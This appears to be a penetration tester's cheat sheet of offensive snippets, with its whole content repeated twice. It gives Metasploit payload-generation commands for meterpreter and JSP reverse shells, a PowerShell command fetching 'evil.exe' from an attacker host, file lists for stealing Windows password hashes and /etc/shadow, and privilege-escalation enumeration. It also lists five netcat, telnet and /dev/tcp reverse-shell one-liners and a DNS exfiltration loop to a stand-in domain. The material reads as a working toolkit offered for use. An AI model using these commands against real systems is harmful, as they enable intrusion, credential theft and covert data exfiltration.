Ryan Bentz sckalath

## metasploit_snippets
#autorun script (session.rc)
migrate -k -n explorer.exe
multi_console_command -cl "getsystem","getuid"
get_env
checkvm

#setting msf to use autorunscript above
set autorunscript multiscript.rb -rc /home/ryan/session.rc

## msfpayload_commands
# generate windows meterpreter on port 4444 that outputs an asp file
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R | msfencode -o mwcb.asp -e generic/none -t asp

#generate jsp reverse tcp over port 443
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp

#would likely need to add this jsp to a WAR file for deployment
jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir

#simple javascript reverse shell over port 443

## powershell_snippets
# Transfer file from attacking box to victim
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"

## windows_blind
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini	This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system	This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system

## linux_blind
# Use these if you have a simple command shell through LFI or something similar.

/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile

## linux_pillage
/apache/logs/access.log
/apache/logs/error.log
/bin/php.ini
/etc/alias
/etc/apache2/apache.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache/conf/httpd.conf
/etc/bash.bashrc
/etc/chttp.conf

## windows_privesc
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

## linux_privesc
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs

## netcat_reverse_shell_backpipe
#1
nc <attacker_ip> <port> -e /bin/bash
#2
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#3
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
#4
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#5
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

## dns_egress_nix
On victim:
1. Hex encode the file to be transferred:
xxd -p secret file.hex
2. Read in each line and do a DNS lookup:
for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done

On attacker:
1. Capture DNS exfil packets
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet
	#autorun script (session.rc)
	migrate -k -n explorer.exe
	multi_console_command -cl "getsystem","getuid"
	get_env
	checkvm

	#setting msf to use autorunscript above
	set autorunscript multiscript.rb -rc /home/ryan/session.rc
	# generate windows meterpreter on port 4444 that outputs an asp file
	msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R \| msfencode -o mwcb.asp -e generic/none -t asp

	#generate jsp reverse tcp over port 443
	msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp

	#would likely need to add this jsp to a WAR file for deployment
	jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir

	#simple javascript reverse shell over port 443
	# Transfer file from attacking box to victim
	powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"
	%SYSTEMDRIVE%\boot.ini
	%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\system
	%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
	%WINDIR%\repair\sam
	%WINDIR%\repair\system
	# Use these if you have a simple command shell through LFI or something similar.

	/etc/issue (A message or system identification to be printed before the login prompt.)
	/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
	/etc/passwd
	/etc/group
	/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
	/etc/shadow
	/home/[USERNAME]/.bash_history or .profile
	~/.bash_history or .profile
	/apache/logs/access.log
	/apache/logs/error.log
	/bin/php.ini
	/etc/alias
	/etc/apache2/apache.conf
	/etc/apache2/conf/httpd.conf
	/etc/apache2/httpd.conf
	/etc/apache/conf/httpd.conf
	/etc/bash.bashrc
	/etc/chttp.conf
	// What system are we connected to?
	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	// Get the hostname and username (if available)
	hostname
	echo %username%

	// Get users
	net users
	net user [username]
	// Determine linux distribution and version
	cat /etc/issue
	cat /etc/*-release
	cat /etc/lsb-release
	cat /etc/redhat-release

	// Determine kernel version - 32 or 64-bit?
	cat /proc/version
	uname -a
	uname -mrs
	#1
	nc <attacker_ip> <port> -e /bin/bash
	#2
	mknod backpipe p; nc <attacker_ip> <port> 0<backpipe \| /bin/bash 1>backpipe
	#3
	/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
	#4
	mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe \| /bin/bash 1>backpipe
	#5
	telnet <attacker_ip> <1st_port> \| /bin/bash \| telnet <attacker_ip> <2nd_port>
	On victim:
	1. Hex encode the file to be transferred:
	xxd -p secret file.hex
	2. Read in each line and do a DNS lookup:
	for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done

	On attacker:
	1. Capture DNS exfil packets
	tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
	2. Cut the exfilled hex from the DNS packet